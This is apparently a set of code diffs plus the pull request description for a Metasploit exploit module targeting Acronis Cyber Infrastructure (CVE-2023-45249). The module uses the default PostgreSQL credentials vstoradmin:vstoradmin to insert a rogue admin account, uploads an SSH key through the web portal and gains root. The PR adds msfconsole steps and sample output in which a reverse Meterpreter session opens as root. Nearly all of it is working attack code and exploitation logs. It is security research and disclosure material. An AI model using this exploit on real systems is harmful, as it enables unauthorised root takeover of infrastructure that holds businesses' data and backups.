+      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Connection error.")
+      return false
+    when :sql_error
+      vprint_warning("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unable to execute query: #{query}.")
+      elog(@res_query[:sql_error])
+      return false
+    when :complete
+      vprint_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Query: #{query} successful.")
+      return true
+    else
+      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unknown.")
+      return false
+    end
+  end
+
+  def add_admin_user(username, userid, password)
+    # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+    vprint_status("Creating admin user #{username} with userid #{userid}")
+
+    # add new admin user to the user table
+    return false unless run_query("insert into \"user\" values(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');")
+
+    # add new admin user to the local_user table
+    return false unless run_query('select * from "local_user" where id = ( select MAX (id) from "local_user" );')
+
+    id_luser = @res_query[:complete].rows[0][0].to_i + 1
+    return false unless run_query("insert into \"local_user\" values(#{id_luser},\'#{userid}\','default',\'#{username}\',NULL,NULL);")
+
+    # hash the password
+    password_hash = Password.create(password)
+    today = Date.today
+    vprint_status("Setting password #{password} with hash #{password_hash}")
+    return false unless run_query('select * from "password" where id = ( select MAX (id) from "password" );')
+
+    id_pwd = @res_query[:complete].rows[0][0].to_i + 1
+    return false unless run_query("insert into \"password\" values(#{id_pwd},#{id_luser},NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');")
+
+    # Getting the admin roles and assign this to the new admin user
+    vprint_status('Getting the admin roles')
+    return false unless run_query("select * from \"project\" where name = 'admin' and domain_id = 'default';")
+
+    id_project_role = @res_query[:complete].rows[0][0]
+    return false unless run_query("select * from \"role\" where name = 'admin';")
+
+    id_admin_role = @res_query[:complete].rows[0][0]
+    vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
+    return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
+
+    vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
+    true
+  end
+
+  def do_sshlogin(ip, user, ssh_opts)
+    # create SSH session.
+    # based on the ssh_opts can this be key or password based.
+    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def aci_login(name, pwd)
+    # Login at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      username: name.to_s,
+      password: pwd.to_s
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 200
+
+    false
+  end
+
+  def upload_sshkey(sshkey)
+    # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      key: sshkey.to_s,
+      event:
+      {
+        name: 'SshKeys',
+        method: 'post',
+        data:
+        {
+          key: sshkey.to_s
+        }
+      }
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', '1', 'ssh-keys'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 202 && res.body.include?('task_id')
+
+    false
+  end
+
+  def execute_command(cmd, _opts = {})
+    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+  rescue Timeout::Error
+    @timeout = true
+  end
+
+  def check_port(port)
+    # checks network port and return true if open and false if closed.
+    Timeout.timeout(datastore['ConnectTimeout']) do
+      TCPSocket.new(datastore['RHOST'], port).close
+      return true
+    rescue StandardError
+      return false
+    end
+  rescue Timeout::Error
+    return false
+  end
+
+  def check
+    # TODO: Improve check
+    CheckCode::Appears
+  end
+
+  def exploit
+    # connect to the PostgreSQL DB with default credentials
+    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected
+
+    # add a new admin user
+    username = Rex::Text.rand_text_alphanumeric(5..8).downcase
+    userid = SecureRandom.hex
+    password = Rex::Text.rand_password
+    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")
+    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)
+
+    # Storing credentials in the msf database
+    if datastore['STORE_CRED']
+      print_status('Saving admin credentials at the msf database.')
+      store_valid_credential(user: username, private: password)
+    end
+
+    # log out from the postsgreSQL DB
+    postgres_logout if postgres_conn
+
+    # create SSH key pair
+    print_status('Creating SSH private and public key.')
+    k = SSHKey.generate(type: 'RSA', bits: 2048)
+    vprint_status(k.private_key)
+    vprint_status("#{k.ssh_public_key} root")
+
+    # log in with the new admin user credentials at the Acronis Admin Portal
+    fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
+
+    # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
+    print_status('Uploading SSH public key at the Acronis Admin Portal.')
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey("#{k.ssh_public_key} root")
+
+    # login with SSH private key to establish SSH root session
+    ssh_opts = ssh_client_defaults.merge({
+      auth_methods: ['publickey'],
+      key_data: [ k.private_key ],
+      port: datastore['SSHPORT']
+    })
+    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    print_status('Authenticating with SSH private key.')
+    fail_with(Failure::NoAccess, 'Failed to authenticate with SSH.') unless do_sshlogin(datastore['RHOST'], 'root', ssh_opts)
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :ssh_interact
+      handler(ssh_socket)
+      return
+    end
+    @timeout ? ssh_socket.shutdown! : ssh_socket.close
+  end
+end

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -121,9 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-    # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+  # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
   def add_admin_user(username, userid, password)
-
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
@@ -159,10 +158,10 @@ class MetasploitModule < Msf::Exploit::Remote
     true
   end
 
+  # create SSH session.
+  # based on the ssh_opts can this be key or password based.
+  # if login is successfull, return true else return false. All other errors will trigger an immediate fail
   def do_sshlogin(ip, user, ssh_opts)
-    # create SSH session.
-    # based on the ssh_opts can this be key or password based.
-    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
     begin
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)
@@ -235,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @timeout = true
   end
 
-  # Return ACI version-release or nil if not found
+  # Return ACI version-release string or nil if not found
   def get_aci_version
     res = send_request_cgi({
       'method' => 'GET',
@@ -259,19 +258,27 @@ class MetasploitModule < Msf::Exploit::Remote
     release = res_json['storage-release']['release']
     return if release.nil?
 
-    Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
+    "#{version}-#{release}".gsub(/[[:space:]]/, '')
   end
 
   def check
     version_release = get_aci_version
     return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.0.1-61')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.1.1-71')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.2.1-69')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.3.1-53')
-    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.4.4-132')
+    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
 
-    CheckCode::Appears("Version #{version_release}")
+    case version_release.split(/\.\d-/)[0]
+    when '5.0'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
+    when '5.1'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')
+    when '5.2'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')
+    when '5.3'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')
+    when '5.4'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')
+    end
+    CheckCode::Safe("Version #{version_release}")
   end
 
   def exploit

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -93,32 +93,14 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
     register_options([
       OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
-      OptBool.new('STORE_CRED', [false, 'Store user admin credentials into the database.', true]),
-      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 5432]),
-      OptPort.new('SSHPORT', [true, 'SSH port', 22])
+      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),
+      OptPort.new('SSHPORT', [true, 'SSH port', 22]),
+      OptString.new('PUB_KEY', [false, 'SSH Public Key', '']),
+      OptString.new('PRIV_KEY', [false, 'SSH Private Key', ''])
     ])
     register_advanced_options([
       OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
     ])
-  end
-
-  def run_query(query)
-    @res_query = postgres_query(query)
-    case @res_query.keys[0]
-    when :conn_error
-      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Connection error.")
-      return false
-    when :sql_error
-      vprint_warning("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unable to execute query: #{query}.")
-      elog(@res_query[:sql_error])
-      return false
-    when :complete
-      vprint_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Query: #{query} successful.")
-      return true
-    else
-      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unknown.")
-      return false
-    end
   end
 
   # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
@@ -126,33 +108,41 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
-    return false unless run_query("insert into \"user\" values(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');")
+    res_query = postgres_query("INSERT INTO \"user\" VALUES(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # add new admin user to the local_user table
-    return false unless run_query('select * from "local_user" where id = ( select MAX (id) from "local_user" );')
+    res_query = postgres_query('SELECT * FROM "local_user" WHERE id = ( SELECT MAX (id) FROM "local_user" );', datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_luser = @res_query[:complete].rows[0][0].to_i + 1
-    return false unless run_query("insert into \"local_user\" values(#{id_luser},\'#{userid}\','default',\'#{username}\',NULL,NULL);")
+    id_luser = res_query[:complete].rows[0][0].to_i + 1
+    res_query = postgres_query("INSERT INTO \"local_user\" VALUES(\'#{id_luser}\',\'#{userid}\','default',\'#{username}\',NULL,NULL);", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # hash the password
     password_hash = Password.create(password)
     today = Date.today
     vprint_status("Setting password #{password} with hash #{password_hash}")
-    return false unless run_query('select * from "password" where id = ( select MAX (id) from "password" );')
+    res_query = postgres_query('SELECT * FROM "password" WHERE id = ( SELECT MAX (id) FROM "password" );', datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_pwd = @res_query[:complete].rows[0][0].to_i + 1
-    return false unless run_query("insert into \"password\" values(#{id_pwd},#{id_luser},NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');")
+    id_pwd = res_query[:complete].rows[0][0].to_i + 1
+    res_query = postgres_query("INSERT INTO \"password\" VALUES(\'#{id_pwd}\',\'#{id_luser}\',NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     # Getting the admin roles and assign this to the new admin user
     vprint_status('Getting the admin roles')
-    return false unless run_query("select * from \"project\" where name = 'admin' and domain_id = 'default';")
+    res_query = postgres_query("SELECT * FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_project_role = @res_query[:complete].rows[0][0]
-    return false unless run_query("select * from \"role\" where name = 'admin';")
+    id_project_role = res_query[:complete].rows[0][0]
+    res_query = postgres_query("SELECT * FROM \"role\" WHERE name = 'admin';", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
-    id_admin_role = @res_query[:complete].rows[0][0]
+    id_admin_role = res_query[:complete].rows[0][0]
     vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
-    return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
+    res_query = postgres_query("INSERT INTO \"assignment\" VALUES('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F');", datastore['VERBOSE'])
+    return false unless res_query.keys[0] == :complete
 
     vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
     true
@@ -292,32 +282,43 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")
     fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)
 
-    # Storing credentials in the msf database
-    if datastore['STORE_CRED']
-      print_status('Saving admin credentials at the msf database.')
-      store_valid_credential(user: username, private: password)
-    end
+    # storing credentials at the msf database
+    print_status('Saving admin credentials at the msf database.')
+    store_valid_credential(user: username, private: password)
 
     # log out from the postsgreSQL DB
     postgres_logout if postgres_conn
 
-    # create SSH key pair
-    print_status('Creating SSH private and public key.')
-    k = SSHKey.generate
-    vprint_status(k.private_key)
-    vprint_status("#{k.ssh_public_key} root")
+    # create or use user provided SSH key pair
+    if datastore['PUB_KEY'].blank? || datastore['PRIV_KEY'].blank?
+      print_status('Creating SSH private and public key.')
+      k = SSHKey.generate
+      priv_key = k.private_key
+      pub_key = "#{k.ssh_public_key} root"
+    else
+      print_status('Using user provided SSH private and public key.')
+      priv_key = datastore['PRIV_KEY']
+      pub_key = "#{datastore['PUB_KEY']} root"
+    end
+    vprint_status(priv_key)
+    vprint_status(pub_key)
+
+    # storing SSH public and private key at the msf database
+    print_status('Saving SSH public and private key pair at the msf database.')
+    store_valid_credential(user: 'ACI SSH public key', private: pub_key)
+    store_valid_credential(user: 'ACI SSH private key', private: priv_key)
 
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey("#{k.ssh_public_key} root")
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(pub_key)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({
       auth_methods: ['publickey'],
-      key_data: [ k.private_key ],
+      key_data: [ priv_key ],
       port: datastore['SSHPORT']
     })
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -25,11 +25,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,
           compute, and network resources. Businesses and Service Providers are using it for data storage,
-          backup storage, creating and managing virtual machines and software-defined networks,running
+          backup storage, creating and managing virtual machines and software-defined networks, running
           cloud-native applications in production environments.
           This module exploits a default password vulnerability in ACI which allow an attacker to access
-          the ACI PostgreSQL database and gain administrative access to the ACI Admin Portal.
-          This opens the door for the attacker to upload ssh keys that enables addministrative root acces
+          the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
+          This opens the door for the attacker to upload ssh keys that enables root acces
           to the appliance/server. This attack can be remotely executed over the WAN as long as the
           PostgreSQL and SSH services are exposed to the outside world.
           ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
@@ -236,21 +236,39 @@ class MetasploitModule < Msf::Exploit::Remote
     @timeout = true
   end
 
-  def check_port(port)
-    # checks network port and return true if open and false if closed.
-    Timeout.timeout(datastore['ConnectTimeout']) do
-      TCPSocket.new(datastore['RHOST'], port).close
-      return true
-    rescue StandardError
-      return false
+  def get_aci_version
+    # Return ACI version-release or nil if not found
+    version_release = nil
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
+    })
+    if res&.code == 200 && res.body.include?('storage-release')
+      # parse json response and get the version
+      res_json = res.get_json_document
+      unless res_json.blank?
+        version = res_json['storage-release']['version']
+        release = res_json['storage-release']['release']
+        version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil?
+      end
+      return version_release
     end
-  rescue Timeout::Error
-    return false
   end
 
   def check
-    # TODO: Improve check
-    CheckCode::Appears
+    version_release = get_aci_version
+    return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?
+    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.0.1-61')
+    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.1.1-71')
+    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.2.1-69')
+    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.3.1-53')
+    return CheckCode::Safe("Version #{version_release}") if version_release >= Rex::Version.new('5.4.4-132')
+
+    CheckCode::Appears("Version #{version_release}")
   end
 
   def exploit

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           cloud-native applications in production environments.
           This module exploits a default password vulnerability in ACI which allow an attacker to access
           the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
-          This opens the door for the attacker to upload ssh keys that enables root acces
+          This opens the door for the attacker to upload SSH keys that enables root access
           to the appliance/server. This attack can be remotely executed over the WAN as long as the
           PostgreSQL and SSH services are exposed to the outside world.
           ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
@@ -121,8 +121,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def add_admin_user(username, userid, password)
     # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+  def add_admin_user(username, userid, password)
+
     vprint_status("Creating admin user #{username} with userid #{userid}")
 
     # add new admin user to the user table
@@ -154,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
     return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
 
-    vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
+    vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
     true
   end
 
@@ -180,8 +181,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return true
   end
 
+  # Login at the Acronis Cyber Infrastructure web portal
   def aci_login(name, pwd)
-    # Login at the Acronis Cyber Infrastructure web portal
     post_data = {
       username: name.to_s,
       password: pwd.to_s
@@ -196,13 +197,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
       'data' => post_data.to_s
     })
-    return true if res&.code == 200
-
-    false
+    return res&.code == 200
   end
 
+  # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
   def upload_sshkey(sshkey)
-    # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
     post_data = {
       key: sshkey.to_s,
       event:
@@ -236,9 +235,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @timeout = true
   end
 
+  # Return ACI version-release or nil if not found
   def get_aci_version
-    # Return ACI version-release or nil if not found
-    version_release = nil
     res = send_request_cgi({
       'method' => 'GET',
       'ctype' => 'application/json',
@@ -247,16 +245,21 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
     })
-    if res&.code == 200 && res.body.include?('storage-release')
-      # parse json response and get the version
-      res_json = res.get_json_document
-      unless res_json.blank?
-        version = res_json['storage-release']['version']
-        release = res_json['storage-release']['release']
-        version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil?
-      end
-      return version_release
-    end
+
+    return unless res&.code == 200
+    return unless res.body.include?('storage-release')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    version = res_json['storage-release']['version']
+    return if version.nil?
+
+    release = res_json['storage-release']['release']
+    return if release.nil?
+
+    Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
   end
 
   def check
@@ -293,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # create SSH key pair
     print_status('Creating SSH private and public key.')
-    k = SSHKey.generate(type: 'RSA', bits: 2048)
+    k = SSHKey.generate
     vprint_status(k.private_key)
     vprint_status("#{k.ssh_public_key} root")
 


### PR DESCRIPTION
Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and software-defined networks,running cloud-native applications in production environments.
This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
This opens the door for the attacker to upload ssh keys that enables root access to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world.
ACI versions `5.0` before build `5.0.1-61`, `5.1` before build `5.1.1-71`, `5.2` before build `5.2.1-69`, `5.3` before build `5.3.1-53`, and `5.4` before build `5.4.4-132` are vulnerable.

The following release was tested.

**Acronis Cyber Infrastructure  ISO appliances:**
* Acronis Cyber Infrastructure 4.7

## Installation steps to install the Acronis Cyber Infrastructure (ACI) appliance
* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
* Download the Acronis Cyber Infrastructure (ACI) iso images from [here](https://care.acronis.com/s/article/63431-Acronis-Cyber-Infrastructure-how-to-download-ISO?language=en_US).
* Install the iso image in your virtualization engine.
* When installed, configure the VM appliance to your needs using the menu options.
* Boot up the VM and should be able to access the Acronis Cyber Infrastructure  (ACI) appliance either thru the console, `ssh` on port `22` or via the `webui` via `http://your_aci_ip:8888`.

You are now ready to test the module.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `exploit/linux/http/acronis_cyber_infra_cve_2023_45249`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ]  `set lhost <attacker-ip>`
- [ ] `set target <0=Unix/Linux Command, 1=Interactive SSH>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

```msf
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > info

       Name: Acronis Cyber Infrastructure default password remote code execution
     Module: exploit/linux/http/acronis_cyber_infra_cve_2023_45249
   Platform: Unix, Linux
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-07-24

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Acronis International GmbH

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix/Linux Command
      1   Interactive SSH

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  DATABASE    keystone         yes       The database to authenticate against
  DBPORT      5432             yes       PostgreSQL DB port
  PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
  PRIV_KEY_FILE                no        SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                         cs/using-metasploit.html
  RPORT       8888             yes       The target port (TCP)
  SSHPORT     22               yes       SSH port
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                yes       Path to the Acronis Cyber Infra application
  USERNAME    vstoradmin       yes       The username to authenticate as
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
  Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,
  compute, and network resources. Businesses and Service Providers are using it for data storage,
  backup storage, creating and managing virtual machines and software-defined networks, running
  cloud-native applications in production environments.
  This module exploits a default password vulnerability in ACI which allow an attacker to access
  the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
  This opens the door for the attacker to upload ssh keys that enables root acces
  to the appliance/server. This attack can be remotely executed over the WAN as long as the
  PostgreSQL and SSH services are exposed to the outside world.
  ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
  5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-45249
  https://security-advisory.acronis.com/advisories/SEC-6452
  https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249

View the full module info with the info -d command
```
## Scenarios
### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command
```msf
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
rhosts => 192.168.201.5
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > check
[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1-53
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.7.1-53
[*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
[*] Saving admin credentials at the msf database.
[*] Creating SSH private and public key.
[*] Saving SSH public and private key pair at the msf database.
[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
[*] Uploading SSH public key at the Acronis Admin Portal.
[*] Authenticating with SSH private key.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 192.168.201.5
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.5:51488) at 2024-09-15 19:45:46 +0000

meterpreter > sysinfo
Computer     : aci-471-53.vstoragedomain
OS           : Red Hat 4.7 (Linux 3.10.0-1160.41.1.vz7.183.5)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH
```msf
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
target => 1
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.7.1-53
[*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
[*] Saving admin credentials at the msf database.
[*] Creating SSH private and public key.
[*] Saving SSH public and private key pair at the msf database.
[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
[*] Uploading SSH public key at the Acronis Admin Portal.
[*] Authenticating with SSH private key.
[*] Executing Interactive SSH for generic/ssh/interact
